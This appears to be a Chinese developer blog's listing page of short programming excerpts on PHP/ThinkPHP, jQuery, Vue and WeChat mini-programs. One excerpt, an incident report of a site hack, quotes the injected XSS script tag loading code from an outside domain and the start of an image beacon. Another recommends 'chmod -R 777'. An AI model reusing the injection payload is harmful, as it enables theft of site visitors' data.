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原创 tp5 和 element plus 实现分页 chatGPT版

TP5 是一个基于 PHP 语言开发的 Web 应用开发框架,而 Element Plus 是一个基于 Vue.js 的组件库。要在 TP5 和 Element Plus 中实现分页功能,可以采取以下步骤:

2023-03-05 00:49:57 606

转载 bower 出现 retry Request to https://registry.bower.io/packages/xxx failed with ECONNRESET

引用github issue上国外网友的回答:If it's any help, I'm facing the same problem in the same conditions (cntlm to bypass corporate proxy). I used bower-canary as@satazorsuggested. Didn't work until I had the following in my .bowerrc如果有任何帮助,我在相同的条件下面临同样的问题(cntlm ..

2021-08-25 15:59:21 1579

原创 自己动手编写一个在线保存百度谷歌搜索关键词历史记录的油猴脚本

标题快捷导航如何通过Web技术实现我们的需求需要的技术栈油猴脚本的编写浏览器扩展的编写后台部分小结如何通过Web技术实现我们的需求相信大家只要会一点前端和后端基础的,一看到这个标题就有思路了,So easy!小菜一碟。下面我来说说我的实现方法和思路。需要的技术栈要实现这个需求,不外乎前端加后端技术,不过在这里我说一下我实现的技术栈:html, css, javascript, jquery, Dom api;php, thinkphp;mysql;JWT;这里说下为什么要用它,不用它后端

2020-08-26 20:49:48 767

原创 学习腾讯课堂---微信小程序|2019全新语法(笔记一)

微信小程序配置文件appjson代码编写1, page里面放置所有和小程序相关的路径2, window项里可以添加"enablePullDownRefresh": true, // 允许下拉刷新"backgroundColor": "#ccc" // 改娈下拉刷新的背景色3, tabBar 定义底部菜单栏例如:"tabBar": { "select...

2020-03-03 01:13:13 308

原创 php 生成随机钱数(带分)

<?phpecho randMoney(10000, 20000);function randMoney($min, $max){ $num = mt_rand($min, $max); $point = randFloat(); $point = floor($point * 100) / 100; $money = $num + $point; ...

2019-03-09 16:42:12 1374

转载 jquery 表格排序

// {#表格排序01#}$(document).on('click', 'th', function() { var table = $(this).parents('table').eq(0); var rows = table.find('tr:gt(0)').toArray().sort(comparer($(this).index())); this.asc = !thi...

2019-03-08 00:47:22 606

原创 js刷新当前页面

<a href="javascript:location.replace(location.href);" title="刷新" ><i class="Hui-iconfont"></i></a> 

2019-02-17 09:17:59 875

原创 thinkphp查询当天购买特定商品的订单数量

// <!--查询当前用户在当天购买特定商品的订单数量$GoodsOrder = M('goods_order');$t_start=strtotime(date("Y-m-d 00:00:01"));$t_end =strtotime(date("Y-m-d 23:59:59"));$mapGo['add_time'] = array(array('egt',$t_start),...

2019-02-09 17:10:37 1689

转载 用 chown 和 chmod 修改目录所属用户及权限

1、修改 tmp 目录所属用户为 root,用户组为 rootchown -R root:root /tmp12、修改 tmp 目录为可写权限chmod -R 777 /tmp

2018-12-18 18:25:33 5362

转载 jquery 模拟手动点击链接代码

html 文件如下: <a href="http://www.baidu.com" id='alipaybtn'>jquery点我</a> jquery 代码如下:var goPay = '<span id="goPay"> <span>';//给A标签中的文字添加一个能被jQuery捕获的元素$('#alipaybtn')....

2018-12-06 16:45:37 1120

转载 js 通用表单提交

<form name='SearchForm' id="form" id='SearchForm' method='POST' action="__ROOT__/admin.php/User/xiaofeiorder"> <input type="text" name = "phone" value="{$phone}" class="bu-in

2018-12-06 13:43:58 181

转载 thinkphp 模板下拉列表根据变量的值设置默认值

<form name='SearchForm' id="form" id='SearchForm' method='POST' action="__ROOT__/admin.php/User/listuser"> <select name="states" class="bu-select"> <option value=&quot

2018-12-06 11:06:48 564

原创 记一次服务器遭遇黑客攻击

运营了一个网站,今天突然后台用户列表打开只有一条记录,还是半截。直觉告诉是字段出了问题,数据库查看一下这条记录的字段,一看下了一跳,竟然是js 注入攻击<sCRiPt/SrC=//baidu.xiaoxiaowu.me/Jg3G>这段代码链接到了一个js文件,不知道这个文件的作用,有谁知道告诉一下。(function() { (new Image()).src = 'h...

2018-12-05 10:27:10 324

转载 php 获取发起请求的类型$_SERVER['REQUEST_METHOD']

<?phpif($_SERVER['REQUEST_METHOD']=='POST' && $_POST['trade_no']){ ......}?> 

2018-12-04 15:50:00 7583

转载 h5检测微信手机端

function isWeixin() { var ua = window.navigator.userAgent.toLowerCase(); if (ua.match(/MicroMessenger/i) == 'micromessenger') { return 1; } else { ...

2018-12-04 15:10:51 478

转载 js 获取主机名函数

function getRootPath() { //获取当前网址,如: http://localhost:8083/uimcardprj/share/meun.jsp var curWwwPath = window.document.location.href; //获取主机地址之后的目录,如: uimcardprj/share/m...

2018-12-04 14:50:13 1581

转载 php &=get 过来的参数转数组

$str = $_SERVER['QUERY_STRING'];$arr = explode('&', $str);$res = array();foreach ($arr as $k => $v) { $arr = explode('=', $v); $res[$arr[0]] = $arr[1];}print_r($res); 

2018-12-04 01:51:13 2613

转载 php 生成全世界唯一订单号

function order_no(){ return substr(date('Ymd') . substr(implode(NULL, array_map('ord', str_split(substr(uniqid(), 7, 13), 1))), 0, 8), 4, 16);}用uniqid获取一个基于当前的微秒数生成的唯一不重复的字符串(但是他的前7位貌似很久才会发生变...

2018-12-03 13:07:29 653

原创 隐藏式加载后自动提交表单

<form style='display:none;' id='form1' name='form1' method='post' action='http://www.sijicn.cn/ThinkPHP/Extend/Vendor/Epay/pay.php'> <input name='money' type='text' value='2.00...

2018-12-01 05:45:58 736 1

原创 Ftpsync for sublime 连接失败解决办法(Command retrlines timed out, retrying)

FTPSync > Command retrlines timed out, retrying (4 remaining)...FTPSync > Command retrlines timed out, retrying (3 remaining)...FTPSync > Command retrlines timed out, retrying (2 remaining)...这是

2017-06-14 11:12:56 2042

原创 php 生成随机字符串

public function getRandCode()    {        $charts = "ABCDEFGHJKLMNPQRSTUVWXYZabcdefghjkmnpqrstuvwxyz0123456789";        $max = strlen($charts);        $noncestr = "";        for($i = 0; $i

2016-10-15 10:34:47 3044

原创 jquery选择器之radio 和id

 $(":radio#1").attr("checked");为了提高效率如下例子   <td class='ui-field-contain'><input type='text' name='actMetric' id='actMetric' data-inline='true'></td> <td class='ui-fi...

2014-09-17 20:42:38 941

原创 phonegap学习进度之项目名称

phonegap 环境配置,现在基本己经将3.

2014-05-03 22:49:37 611

原创 斯坦福大学开放课程——编程方法 作业1-4 (只解决奇数宽度的算法)【在中心点放置Beeper】

下面的中文翻译是引用,出自:http://blog.csdn.net/goodpress/article/details/6170386Problem 4 As an exercise in solving algorithmic problems, program Karel to place a single beeper at the center of 1st Street

2012-10-12 22:08:23 1198

原创 斯坦福大学开放课程——编程方法 作业1-4 (完美解决任何地图都能找到中点)【在中心点放置Beeper】

下面的中文翻译是引用,出自:http://blog.csdn.net/goodpress/article/details/6170386Problem 4 As an exercise in solving algorithmic problems, program Karel to place a single beeper at the center of 1st Street

2012-10-11 13:34:04 2423 4

梁灏 留言板实战 练习 template 实现方式源码

主要搞懂了组件v-model 的用法。


大黄蜂云课堂播放器 v4.0.10官方PC版



13-15订单状态未成功修改的原因 正确版

网上流传的<ThinkPHP> 第十三章 13-15 订单状态未成功修改的原因 出现错误牛头不对马嘴的情况,好不容易找到正确的版本,提供给大家。











COM Standard Library

This is a standard library COM.ahk. It requires at least AHK build Before downloading, please read first about Standard Library. Libraries of Functions: Standard Library and User Library [v1.0.47+] A script may call a function in an external file without having to use #Include. For this to work, a file of the same name as the function must exist in one of the following library directories: %A_MyDocuments%\AutoHotkey\Lib\ ; User library. This directory is optional; it may be entirely absent. path-to-the-currently-running-AutoHotkey.exe\Lib\ ; Standard library. This is also optional.For example, if a script calls a nonexistent function MyFunc(), the program searches for a file named MyFunc.ahk in the user library. If not found there, it searches for it in the standard library. If a match is still not found and the function's name contains an underscore (e.g. MyPrefix_MyFunc), the program searches both libraries for a file named MyPrefix.ahk and loads it if it exists. This allows MyPrefix.ahk to contain both the function MyPrefix_MyFunc and other related functions whose names start with MyPrefix_. Although a library file generally contains only a single function of the same name as its filename, it may also contain private functions and subroutines that are called only by it. However, such functions should have fairly distinct names because they will still be in the global namespace; that is, they will be callable from anywhere in the script. If a library file uses #Include, the working directory for #Include is the library file's own directory. This can be used to create a redirect to a larger library file that contains that function and others related to it. The script compiler (ahk2exe) also supports library functions. However, it requires that a copy of AutoHotkey.exe exist in the directory above the compiler directory (which is normally the case). If AutoHotkey.exe is absent, the compiler still works but library functions are not automatically included. Functions included from a library perform just as well as other functions because they are pre-loaded before the script begins executing.






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